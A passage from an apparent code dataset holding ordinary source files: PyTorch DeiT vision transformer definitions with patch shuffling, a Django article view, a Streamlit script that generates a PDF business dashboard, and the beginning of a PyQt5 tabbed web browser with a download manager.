return_idex=False):\n batchsize = features.size(0)\n dim = 
features.size(-1)\n labels = torch.arange(0, features.size(-2), 1, device=features.device).expand(batchsize, -1)\n\n # Shift Operation\n feature_random = torch.cat([features[:, begin-1+shift:], features[:, begin:begin-1+shift]], dim=1)\n labels = torch.cat([labels[:, begin-1+shift:], labels[:, begin:begin-1+shift]], dim=1)\n x = feature_random\n\n # Patch Shuffle Operation\n x = x.view(batchsize, group, -1, dim)\n x = torch.transpose(x, 1, 2).contiguous()\n x = x.view(batchsize, -1, dim)\n\n labels = labels.view(batchsize, group, -1, 1)\n labels = torch.transpose(labels, 1, 2).contiguous()\n labels = labels.view(batchsize, -1)\n\n if return_idex:\n return x, labels\n return x\n\ndef random_shuffle_unit(features, return_idex=False, batch_premutation=False, sort_label=None):\n if sort_label:\n B, N, C = features.shape\n labels = []\n perms_idx = []\n for b in range(B):\n perm_idx = random.choice(list(sort_label.keys()))\n label = sort_label[perm_idx]\n perms_idx.append(perm_idx + b * N)\n labels.append(label)\n perms_idx = torch.cat(perms_idx)\n x = features.contiguous().view(-1, C)\n x = x[perms_idx, :]\n x = x.view(B, N, C)\n\n if return_idex:\n return x, torch.tensor(labels, device=features.device), perms_idx\n\n if batch_premutation:\n B, N, C = features.shape\n labels = torch.arange(0, N, 1, device=features.device)\n # labels = (labels - labels.min())/(labels.max() - labels.min()) + 1e-8\n labels = labels.expand(B, -1)\n\n # perturbation = torch.rand([B, N], device=features.device) - torch.rand([B, N], device=features.device)\n # labels = labels + perturbation\n\n index = torch.cat([torch.randperm(N) + b * N for b in range(B)], dim=0)\n x = features.contiguous().view(-1, C)\n x = x[index, :]\n x = x.view(B, N, C)\n labels = labels.contiguous().view(-1)[index].view(B, -1)\n\n else:\n batchsize = features.size(0)\n dim = features.size(-1)\n num_patch = features.size(-2)\n\n labels = torch.arange(0, features.size(-2), 1, device=features.device)\n # labels = (labels - labels.min())/(labels.max() - labels.min()) + 1e-8\n labels = labels.expand(batchsize, -1)\n\n # perturbation = torch.rand([B, N]) - torch.rand([B, N])\n # labels = labels + perturbation\n\n index = torch.randperm(features.size(-2))\n labels = labels[:, index]\n x = features[:, index, :]\n\n if return_idex:\n return x, labels, index\n return x\n\nclass Attention(nn.Module):\n def __init__(self, dim, num_heads=8, qkv_bias=False, attn_drop=0., proj_drop=0.):\n super().__init__()\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = head_dim ** -0.5\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n self.attn = None\n\n def forward(self, x):\n xori = x\n B, N, C = x.shape\n\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n q, k, v = qkv.unbind(0) # make torchscript happy (cannot use tensor as tuple)\n\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n self.attn = attn\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n def get_attn(self):\n return self.attn\n\n\nclass Mlp(nn.Module):\n \"\"\" MLP as used in Vision Transformer, MLP-Mixer and related networks\n \"\"\"\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or 
in_features\n hidden_features = hidden_features or in_features\n drop_probs = helpers.to_2tuple(drop)\n\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.drop1 = nn.Dropout(drop_probs[0])\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop2 = nn.Dropout(drop_probs[1])\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop1(x)\n x = self.fc2(x)\n x = self.drop2(x)\n return x\n\nclass Block(nn.Module):\n\n def __init__(self, args, dim, num_heads, mlp_ratio=4., qkv_bias=False, drop=0., attn_drop=0.,\n drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm):\n super().__init__()\n self.norm1 = norm_layer(dim)\n self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, attn_drop=attn_drop, proj_drop=drop)\n # NOTE: drop path for stochastic depth, we shall see if this is better than dropout here\n self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)\n\n def forward(self, x):\n x = x + self.drop_path(self.attn(self.norm1(x)))\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\n\nclass DistilledVisionTransformer(VisionTransformer):\n def __init__(self, *args, **kwargs):\n self._args = kwargs['args']\n del kwargs['args']\n\n super().__init__(*args, **kwargs)\n\n self.dist_token = nn.Parameter(torch.zeros(1, 1, self.embed_dim))\n num_patches = self.patch_embed.num_patches\n self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 2, self.embed_dim))\n self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if self.num_classes > 0 else nn.Identity()\n\n # dpr = [x.item() for x in torch.linspace(0, kwargs['drop_path_rate'], kwargs['depth'])] # stochastic depth decay rule\n # self.blocks = nn.Sequential(*[\n # Block(\n # dim=kwargs['embed_dim'], num_heads=kwargs['num_heads'], mlp_ratio=kwargs['mlp_ratio'], qkv_bias=kwargs['qkv_bias'], drop=kwargs['drop_rate'],\n # attn_drop=kwargs['attn_drop_rate'], drop_path=dpr[i], norm_layer=kwargs['norm_layer'], act_layer=kwargs['act_layer'])\n # for i in range(kwargs['depth'])])\n\n trunc_normal_(self.dist_token, std=.02)\n trunc_normal_(self.pos_embed, std=.02)\n self.head_dist.apply(self._init_weights)\n\n self.shuffle = self._args.shuffle\n self.Token_cutoff = self._args.Token_cutoff\n self.tua_token = self._args.tua_token\n\n self.Feature_cutoff = self._args.Feature_cutoff\n self.tua_feature = self._args.tua_feature\n\n def forward_features(self, x):\n # taken from https://github.com/rwightman/pytorch-image-models/blob/master/timm/models/vision_transformer.py\n # with slight modifications to add the dist_token\n B = x.shape[0]\n x = self.patch_embed(x)\n cls_tokens = self.cls_token.expand(B, -1, -1) # stole cls_tokens impl from Phil Wang, thanks\n dist_token = self.dist_token.expand(B, -1, -1)\n x = torch.cat((cls_tokens, dist_token, x), dim=1)\n\n x = x + self.pos_embed\n x = self.pos_drop(x)\n\n if self.shuffle and self.training:\n CLS, DIS = x[:, 0, :].unsqueeze(1), x[:, 1, :].unsqueeze(1)\n x = shuffle_unit(x[:, 2:, :], shift=8, group=2)\n x = torch.cat((CLS, DIS, x), dim=1)\n\n for blk in self.blocks:\n x = blk(x)\n if self.Token_cutoff and self.training:\n x = TokensCutOff(x, self.tua_token)\n if self.Feature_cutoff and self.training:\n x = FeatureCutOff(x, self.tua_feature)\n \n x = self.norm(x)\n return x[:, 0], x[:, 1]\n\n def forward(self, x):\n x, x_dist = 
self.forward_features(x)\n x = self.head(x)\n x_dist = self.head_dist(x_dist)\n if self.training:\n return x, x_dist\n else:\n # during inference, return the average of both classifier predictions\n return (x + x_dist) / 2\n\nclass Video2Image(nn.Module):\n def __init__(self, inp_channel=16):\n super(Video2Image, self).__init__()\n # self.MLP = nn.Sequential(\n # # input: [B, N, C]\n # nn.Linear(C, C//2),\n # nn.ReLU(),\n # nn.Linear(C//2, C)\n # )\n self.channel1 = nn.Conv2d(inp_channel, 1, kernel_size=1, stride=1, padding=0, bias=False)\n self.channel2 = nn.Conv2d(inp_channel, 1, kernel_size=1, stride=1, padding=0, bias=False)\n self.channel3 = nn.Conv2d(inp_channel, 1, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn = nn.BatchNorm2d(3)\n self.relu = nn.ReLU(inplace=False)\n\n self.channel1_reverse = nn.Conv2d(1, inp_channel, kernel_size=1, stride=1, padding=0, bias=False)\n self.channel2_reverse = nn.Conv2d(1, inp_channel, kernel_size=1, stride=1, padding=0, bias=False)\n self.channel3_reverse = nn.Conv2d(1, inp_channel, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn_reverse = nn.BatchNorm3d(3)\n self.relu_reverse = nn.ReLU(inplace=False)\n\n self.compressed = None\n \n def get_compressed_img(self):\n return self.compressed\n\n def forward(self, x):\n B, C, T, H, W = x.shape\n # x = rearrange(x, 'b c t h w -> (b c) t h w)')\n x_channel1 = self.channel1(x[:, 0, :, :, :])\n x_channel2 = self.channel2(x[:, 1, :, :, :])\n x_channel3 = self.channel3(x[:, 2, :, :, :])\n x = torch.cat((x_channel1, x_channel2, x_channel3), dim=1)\n x = self.relu(self.bn(x))\n self.compressed = x\n \n x_channel1_reverse = self.channel1_reverse(x[:, 0, :, :].unsqueeze(1))\n x_channel2_reverse = self.channel2_reverse(x[:, 1, :, :].unsqueeze(1))\n x_channel3_reverse = self.channel3_reverse(x[:, 2, :, :].unsqueeze(1))\n x_reverse = torch.cat((x_channel1_reverse.unsqueeze(1), x_channel2_reverse.unsqueeze(1), x_channel3_reverse.unsqueeze(1)), dim=1)\n x_reverse = self.relu_reverse(self.bn_reverse(x_reverse))\n return x, x_reverse\n\nclass VisionTransformer(VisionTransformer):\n def __init__(self, *args, **kwargs):\n self._args = kwargs['args']\n del kwargs['args']\n super().__init__(*args, **kwargs)\n\n dpr = [x.item() for x in torch.linspace(0, kwargs['drop_path_rate'], kwargs['depth'])] # stochastic depth decay rule\n self.blocks = nn.Sequential(*[\n Block(\n self._args, dim=kwargs['embed_dim'], num_heads=kwargs['num_heads'], mlp_ratio=kwargs['mlp_ratio'], qkv_bias=kwargs['qkv_bias'], drop=kwargs['drop_rate'],\n drop_path=dpr[i], norm_layer=kwargs['norm_layer'])\n for i in range(kwargs['depth'])])\n \n num_patches = self.patch_embed.num_patches\n self.pos_embed = nn.Parameter(torch.zeros(1, num_patches+1, self.embed_dim))\n trunc_normal_(self.pos_embed, std=.02)\n\n self.video2Img = Video2Image(self._args.sample_duration)\n \n def get_cls_token(self):\n return self.CLSToken\n def get_patch_token(self):\n return self.PatchToken\n\n def forward_features(self, x):\n x = self.patch_embed(x)\n cls_token = self.cls_token.expand(x.shape[0], -1, -1) # stole cls_tokens impl from Phil Wang, thanks\n x = torch.cat((cls_token, x), dim=1)\n x = self.pos_drop(x + self.pos_embed)\n\n for blk in self.blocks:\n x = blk(x)\n x = self.norm(x)\n self.PatchToken = x[:, 1:]\n\n return self.pre_logits(x[:, 0])\n \n def forward(self, x): \n # x.size: torch.Size([16, 3, 16, 224, 224])\n x, x_reverse = self.video2Img(x)\n x = self.forward_features(x)\n self.CLSToken = x\n x = self.head(x)\n return x, 
x_reverse\n\n\n@register_model\ndef deit_tiny_patch16_224(pretrained=False, **kwargs):\n model = VisionTransformer(\n patch_size=16, embed_dim=192, depth=12, num_heads=3, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_tiny_patch16_224-a1311bcf.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_small_patch16_224(pretrained=False, **kwargs):\n model = VisionTransformer(\n patch_size=16, embed_dim=384, depth=12, num_heads=6, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_small_patch16_224-cd65a155.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_base_patch16_224(pretrained=False, **kwargs):\n model = VisionTransformer(\n patch_size=16, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_base_patch16_224-b5f2ef4d.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_tiny_distilled_patch16_224(pretrained=False, **kwargs):\n model = DistilledVisionTransformer(\n patch_size=16, embed_dim=192, depth=12, num_heads=3, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_tiny_distilled_patch16_224-b40b3cf7.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_small_distilled_patch16_224(pretrained=False, **kwargs):\n model = DistilledVisionTransformer(\n patch_size=16, embed_dim=384, depth=12, num_heads=6, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_small_distilled_patch16_224-649709d9.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_base_distilled_patch16_224(pretrained=False, **kwargs):\n model = DistilledVisionTransformer(\n patch_size=16, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_base_distilled_patch16_224-df68dfff.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_base_patch16_384(pretrained=False, **kwargs):\n model = VisionTransformer(\n img_size=384, patch_size=16, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n 
model.default_cfg = _cfg()\n    if pretrained:\n        checkpoint = torch.hub.load_state_dict_from_url(\n            url=\"https://dl.fbaipublicfiles.com/deit/deit_base_patch16_384-8de9b5d1.pth\",\n            map_location=\"cpu\", check_hash=True\n        )\n        model.load_state_dict(checkpoint[\"model\"])\n    return model\n\n\n@register_model\ndef deit_base_distilled_patch16_384(pretrained=False, **kwargs):\n    model = DistilledVisionTransformer(\n        img_size=384, patch_size=16, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True,\n        norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n    model.default_cfg = _cfg()\n    if pretrained:\n        checkpoint = torch.hub.load_state_dict_from_url(\n            url=\"https://dl.fbaipublicfiles.com/deit/deit_base_distilled_patch16_384-d0272ac0.pth\",\n            map_location=\"cpu\", check_hash=True\n        )\n        model.load_state_dict(checkpoint[\"model\"])\n    return model\n\ndef _create_resnet(variant, pretrained=False, **kwargs):\n    del kwargs['args']\n    return build_model_with_cfg(ResNet, variant, pretrained, default_cfg=_cfg_resnet(), **kwargs)\n\n@register_model\ndef resnet50(pretrained=False, **kwargs):\n    \"\"\"Constructs a ResNet-50 model.\n    \"\"\"\n    model_args = dict(block=Bottleneck, layers=[3, 4, 6, 3], **kwargs)\n    model = _create_resnet('resnet50', pretrained, **model_args)\n    return model\n\n@register_model\ndef resnet101(pretrained=False, **kwargs):\n    \"\"\"Constructs a ResNet-101 model.\n    \"\"\"\n    model_args = dict(block=Bottleneck, layers=[3, 4, 23, 3], **kwargs)\n    model = _create_resnet('resnet101', pretrained, **model_args)\n    return model","repo_name":"zhoubenjia/MotionRGBD-PAMI","sub_path":"lib/model/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":19617,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"37905864837","text":"\"\"\"\nTo render html web pages\n\"\"\"\n\nimport random\n\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template, render_to_string\n\nfrom articles.models import Article\n\n\ndef article_home_view(request):\n    return HttpResponse()\n\n\ndef home_view(request, *args, **kwargs):\n    \"\"\"\n    Take in a request from Django\n    Return HTML as a response\n    \"\"\"\n    name = \"Harpreet\"\n    number = random.randint(1, 4)\n    article_obj = Article.objects.get(id=number)\n    article_queryset = Article.objects.all()\n\n    context = {\n        \"object\": article_obj,\n        \"object_list\": article_queryset,\n        \"title\": article_obj.title,\n        \"id\": article_obj.id,\n        \"content\": article_obj.content\n    }\n\n    tmpl = get_template(\"home-view.html\")\n    tmpl_string = tmpl.render(context=context)\n\n    html_string = render_to_string(\"home-view.html\", context=context)\n\n    return HttpResponse(tmpl_string)\n","repo_name":"hssainidev/Try-Django","sub_path":"try_django/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1056778913","text":"import streamlit as st\r\nimport matplotlib.pyplot as plt\r\nfrom fpdf import FPDF\r\nimport base64\r\nimport numpy as np\r\nfrom tempfile import NamedTemporaryFile\r\n\r\ndef create_download_link(val, filename):\r\n    b64 = base64.b64encode(val)  # val looks like b'...'\r\n    return f'<a href=\"data:application/octet-stream;base64,{b64.decode()}\" download=\"{filename}\">Download file</a>' \r\n\r\n#framework style\r\n#pdf_w=210\r\n#pdf_h=297 \r\n\r\n#def lines(pdf):\r\n    #pdf.set_fill_color(255, 255, 255) # color for outer 
rectangle\r\n    #pdf.rect(5.0, 5.0, 200.0,287.0,'DF')\r\n    #pdf.set_fill_color(255, 255, 255) # color for inner rectangle\r\n    #pdf.rect(8.0, 8.0, 194.0,282.0,'FD')\r\n#Title\r\ndef title(pdf):\r\n\tpdf.set_font('Arial', 'B', 16)\r\n\tpdf.cell(200, 10, txt = \"Google Maps Dashboard\", ln = 1, align = 'C')\r\n#Logo\r\ndef logo(pdf):\r\n\tpdf.image(name = 'logo1.png', x = 65, y = 19, w = 90, h = 50, link = 'http://localhost:8501/media/f27f03a91f9ea879ce3fac82f75f94d9cc4b318f6b0338dac6b93970.png')\r\n\r\n#i = 2\r\n#business_name = 'Chili\\'s'\r\n#types = ['Restaurant', 'Food', 'Place of Interest']\r\n#Business name\r\nbusiness_name = 'Chili\\'s' \r\ndef business(pdf, business_name):\r\n\tpdf.set_font('Arial', 'B', 18)\r\n\tpdf.text(x = 100, y = 70, txt = business_name)\r\n#Business type\r\ntypes = ['Restaurant', 'Food', 'Place of Interest']\r\ndef business_types(pdf, item, y):\r\n\tpdf.set_font('Arial', '', 14)\r\n\t#pdf.set_text_color(102, 102, 255)\r\n\tpdf.text(x = 10, y = y, txt = item)\r\n#Address\r\naddress = 'C. 60 local 124, Zona Industrial'\r\ndef business_address(pdf, address):\r\n\tpdf.set_font('Arial', '', 14)\r\n\tpdf.text(x = 33, y = 125, txt = address)\r\n#business\r\ndef column_my_business(pdf):\r\n\tpdf.set_font('Arial', 'B', 14)\r\n\tpdf.text(x = 30, y= 140, txt = 'My business')\r\n\tpdf.text(x = 150, y = 140, txt = 'Others')\r\n#rating\r\nmy_rating = '4.2'\r\nother_rating = '4.0'\r\ndef business_rating(pdf, my_rating, other_rating):\r\n\tpdf.set_font('Arial', '', 12)\r\n\tpdf.text(x = 52, y= 150, txt = my_rating)\r\n\tpdf.text(x = 183, y = 150, txt = other_rating)\r\n#price level\r\nmy_price_level = '4.0'\r\nother_price_level = '3.0'\r\ndef pricing_level(pdf, my_price_level, other_price_level):\r\n\tpdf.set_font('Arial', '', 12)\r\n\tpdf.text(x = 61, y = 160, txt = my_price_level)\r\n\tpdf.text(x = 192, y = 160, txt = other_price_level)\r\n#comments\r\nmy_comment_number = '150'\r\nother_comment_number = '120'\r\ndef comment_number(pdf, my_comment_number, other_comment_number):\r\n\tpdf.set_font('Arial', '', 12)\r\n\tpdf.text(x = 61, y = 170, txt = my_comment_number)\r\n\tpdf.text(x = 186, y = 170, txt = other_comment_number)\r\n\r\n\r\nclass PDF(FPDF):\r\n\r\n\tpdf = FPDF()#pdf object\r\n\tpdf = FPDF(orientation='L')\r\n\tpdf = FPDF(unit='mm') #unit of measurement\r\n\tpdf = FPDF(format='A4') #page format. 
A4 is the default value of the format, you don't have to specify it.\r\n\tpdf = FPDF(orientation='P', unit='mm', format='A4')\r\n\r\n\tpdf.add_page()\r\n\t#lines(pdf)\r\n\ttitle(pdf) \r\n\tlogo(pdf)\r\n\tbusiness(pdf, business_name)\r\n\t#pdf.set_text_color(220, 50, 50)\r\n\tpdf.text(x = 10, y = 80, txt = 'Types:')\r\n\ty = 90\r\n\tfor item in types:\r\n\t\tbusiness_types(pdf, item, y)\r\n\t\ty += 10\r\n\tpdf.set_font('Arial', 'B', 14)\r\n\tpdf.text(x = 10, y = 125, txt = 'Address: ')\r\n\tbusiness_address(pdf, address)\r\n\tcolumn_my_business(pdf)\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 30, y = 150, txt = 'My rating:')\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 150, y = 150, txt = 'Average rating:')\r\n\tbusiness_rating(pdf, my_rating, other_rating)\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 30, y = 160, txt = 'My price level:')\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 150, y = 160, txt = 'Average price level:')\r\n\tpricing_level(pdf, my_price_level, other_price_level)\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 30, y = 170, txt = 'My comments:')\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 150, y = 170, txt = 'Other comments:')\r\n\tcomment_number(pdf, my_comment_number, other_comment_number)\r\n\thtml = create_download_link(pdf.output(dest=\"S\").encode(\"latin-1\"), \"testfile\")\r\n\tst.markdown(html, unsafe_allow_html=True)\r\n\tpdf.output('test.pdf','F')\r\n","repo_name":"isabel-eng/Maps","sub_path":"pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27610427903","text":"import sys\nimport os\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nQCoreApplication.setAttribute(Qt.AA_UseOpenGLES)\nQCoreApplication.setAttribute(Qt.AA_ShareOpenGLContexts)\nQCoreApplication.setAttribute(Qt.AA_UseDesktopOpenGL)\nfrom PyQt5.QtGui import *\nfrom urllib.parse import urlparse\nfrom PyQt5.QtWebEngineWidgets import *\n\n\nclass BrowserTab(QWidget):\n    def __init__(self, url):\n        super(BrowserTab, self).__init__()\n\n        # Create the browser widget and set the default url\n        self.browser = QWebEngineView()\n        self.setAttribute(Qt.WA_DeleteOnClose)\n        self.browser.setUrl(QUrl(url))\n\n        # Set the layout for the tab\n        layout = QVBoxLayout()\n        layout.addWidget(self.browser)\n        self.setLayout(layout)\n\n        self.browser.page().profile().downloadRequested.connect(self.download)\n        self.browser.page().fullScreenRequested.connect(self.FullscreenRequest)\n        self.is_fullscreen = False\n\n    def download(self, download_item):\n        # Get the suggested file name and the MIME type\n        mime_type = download_item.mimeType()\n        suggested_file_name = download_item.suggestedFileName()\n        default_dir = QStandardPaths.writableLocation(QStandardPaths.DownloadLocation)\n        # Set the default file path to the \"Downloads\" folder\n        default_file_path = os.path.join(default_dir, suggested_file_name)\n        # Ask the user to select a file name and a save location\n        file_path, _ = QFileDialog.getSaveFileName(self, \"Save File\", default_file_path,\n                                                   \"{} files (*.{})\".format(mime_type, mime_type.split(\"/\")[-1]))\n\n        # Start the download if a file path is selected\n        if file_path:\n            download_item.setPath(file_path)\n            download_item.accept()\n\n            # Add a progress bar to show the download progress\n            progress_bar = 
QProgressBar(self)\n            progress_bar.setOrientation(Qt.Horizontal)\n            progress_bar.setMaximum(100)\n            progress_bar.setMinimum(0)\n            progress_bar.setValue(0)\n            progress_bar.setTextVisible(True)\n            progress_bar.setAlignment(Qt.AlignCenter)\n            progress_bar.setFixedWidth(self.width())\n            progress_bar.setStyleSheet(\"\"\"\n                QProgressBar::chunk {\n                    background-color: #4CAF50;\n                }\n                QProgressBar {\n                    border: 1px solid grey;\n                    border-radius: 5px;\n                    padding: 1px;\n                    text-align: center;\n                    font: bold 12px;\n                }\n            \"\"\")\n            self.layout().addWidget(progress_bar)\n\n            # Update the progress bar with the download progress\n            # (guard against an unknown total size to avoid division by zero)\n            download_item.downloadProgress.connect(lambda bytes_received, total_bytes:\n                                                   progress_bar.setValue(int(100 * bytes_received / total_bytes) if total_bytes > 0 else 0))\n\n            # Connect the cancel button click event to the cancellation function\n            cancel_button = QPushButton(\"Cancel\", self)\n            cancel_button.clicked.connect(lambda: self.cancel_download(download_item, progress_bar, file_path))\n            self.layout().addWidget(cancel_button)\n\n            # Remove the progress bar and cancel button once the download is complete\n            download_item.finished.connect(lambda: self.cleanup_download(progress_bar, cancel_button, file_path))\n\n    def cancel_download(self, download_item, progress_bar, file_path):\n        # Cancel the download and remove the progress bar\n        download_item.cancel()\n        progress_bar.deleteLater()\n\n        # Delete the partially downloaded file\n        if os.path.exists(file_path):\n            os.remove(file_path)\n\n    def cleanup_download(self, progress_bar, cancel_button, file_path):\n        # Remove the progress bar and cancel button; keep the downloaded file\n        progress_bar.deleteLater()\n        cancel_button.deleteLater()\n\n    def FullscreenRequest(self, request):\n        request.accept()\n        if request.toggleOn():\n            if not self.is_fullscreen:\n                self.browser.setParent(None)\n                self.browser.showFullScreen()\n                self.is_fullscreen = True\n        else:\n            if self.is_fullscreen:\n                self.browser.setParent(self)\n                self.layout().addWidget(self.browser)\n                self.browser.showNormal()\n                self.is_fullscreen = False\n\n\nclass BrowserWindow(QMainWindow):\n    def __init__(self):\n        super(BrowserWindow, self).__init__()\n\n        self.tab_widget = QTabWidget()\n        self.tab_widget.setTabsClosable(True)  # Make the tabs closable\n        self.tab_widget.tabCloseRequested.connect(\n            self.close_tab)  # Connect the tabCloseRequested signal to the close_tab function\n        self.tab_widget.addTab(BrowserTab(\"http://www.google.com\"), \"Google\")\n        self.tab_widget.currentChanged.connect(self.current_browser)\n        self.setCentralWidget(self.tab_widget)\n        self.current_browser().urlChanged.connect(self.update_urlbar)\n        self.setWindowTitle(\"My Web Browser\")\n        self.setWindowIcon(QIcon(\"icons/icon.png\"))\n        self.setMinimumSize(600, 600)\n        self.setStyleSheet(\"background-color: white;\")\n        self.tab_widget.currentChanged.connect(self.update_urlbar_and_tab_text)\n\n        # Create the navigation toolbar and add the buttons\n        navbar = QToolBar(\"Navigation\")\n\n        navbar.setStyleSheet(\"\"\"\n            QToolBar {\n                background-color: #f2f2f2;\n                border-bottom: 1px solid #d9d9d9;\n                padding: 5px;\n            }\n\n            QToolButton {\n                background-color: transparent;\n                color: #333;\n                border: none;\n                padding: 8px;\n                margin-right: 5px;\n                font-weight: bold;\n            }\n\n            QToolButton:hover {\n                background-color: rgba(0, 0, 0, 0.1);\n                border-radius: 8px;\n            }\n\n            QToolButton:pressed {\n                background-color: 
rgba(0, 0, 0, 0.2);\n                border-radius: 8px;\n            }\n\n            QToolButton:checked {\n                background-color: #008080;\n                color: white;\n            }\n        \"\"\")\n\n        self.addToolBar(navbar)\n        navbar.setFixedHeight(50)\n\n        back_btn = QAction(QIcon(\"icons/xb.png\"), \"\", self)\n        back_btn.triggered.connect(lambda: self.current_browser().back())\n        navbar.addAction(back_btn)\n\n        forward_btn = QAction(QIcon(\"icons/xf.png\"), \"\", self)\n        forward_btn.triggered.connect(lambda: self.current_browser().forward())\n        navbar.addAction(forward_btn)\n\n        home_btn = QAction(QIcon(\"icons/xh.png\"), \"\", self)\n        home_btn.triggered.connect(lambda: self.current_browser().setUrl(QUrl(\"https://www.google.com\")))\n        navbar.addAction(home_btn)\n\n        reload_btn = QAction(QIcon(\"icons/x.png\"), \"\", self)\n        reload_btn.triggered.connect(lambda: self.current_browser().reload())\n        reload_btn.setProperty(\"showDecorationSelected\", False)\n        navbar.addAction(reload_btn)\n\n        self.httpsicon = QLabel()\n        self.httpsicon.setStyleSheet(\"background-color: #f2f2f2; border-top: 0px solid #d9d9d9;\")\n        navbar.addWidget(self.httpsicon)\n\n        # Create the address bar and connect to the urlChanged signal\n        self.urlbar = QLineEdit()\n        self.urlbar.returnPressed.connect(self.navigate_to_url)\n        self.urlbar.setFixedHeight(25)\n        navbar.addWidget(self.urlbar)\n        self.urlbar.setStyleSheet(\"\"\"\n            background-color: #f7f7f7;\n            color: black;\n            border: 2px solid gray;\n            border-radius: 5px;\n        \"\"\")\n\n        self.current_browser().urlChanged.connect(self.update_urlbar)\n\n        # Add a button to create a new tab\n        new_tab_btn = QAction(QIcon(\"icons/yıldız.png\"), \"\", self)\n        new_tab_btn.triggered.connect(self.add_tab)\n        navbar.addAction(new_tab_btn)\n\n    def update_tab_text(self, url):\n        current_index = self.tab_widget.currentIndex()\n        if current_index != -1:\n            tab_text = self.get_tab_text_from_url(url)\n            tab_text = tab_text.capitalize()  # Capitalize the first letter\n            self.tab_widget.setTabText(current_index, tab_text)\n\n    def update_urlbar_and_tab_text(self):\n        current_browser = self.current_browser()\n        if current_browser is not None:\n            url = 